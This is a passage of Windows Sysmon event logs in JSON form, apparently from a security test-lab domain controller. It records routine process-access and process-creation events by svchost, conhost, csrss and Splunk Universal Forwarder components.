C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:54.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8175,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:54.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:54.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8176,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:54.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:54.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8177,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:54.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:54.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8178,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:54.372\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-00103ED91100}\r\nTargetProcessId: 3388\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:54.372","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-00103ED91100}","TargetProcessId":"3388","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8179,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:54.512\r\nSourceProcessGUID: {A837DB8D-0516-5F25-0000-0010322A1300}\r\nSourceProcessId: 3388\r\nSourceThreadId: 4364\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:54.512","SourceProcessGUID":"{A837DB8D-0516-5F25-0000-0010322A1300}","SourceProcessId":"3388","SourceThreadId":"4364","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8180,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:55.701\r\nProcessGuid: {A837DB8D-0517-5F25-0000-0010892C1300}\r\nProcessId: 4960\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:00:55.701","ProcessGuid":"{A837DB8D-0517-5F25-0000-0010892C1300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8181,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:55.700\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0517-5F25-0000-0010892C1300}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:55.700","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0517-5F25-0000-0010892C1300}","TargetProcessId":"4960","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8182,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:55.700\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0517-5F25-0000-0010892C1300}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:55.700","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0517-5F25-0000-0010892C1300}","TargetProcessId":"4960","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
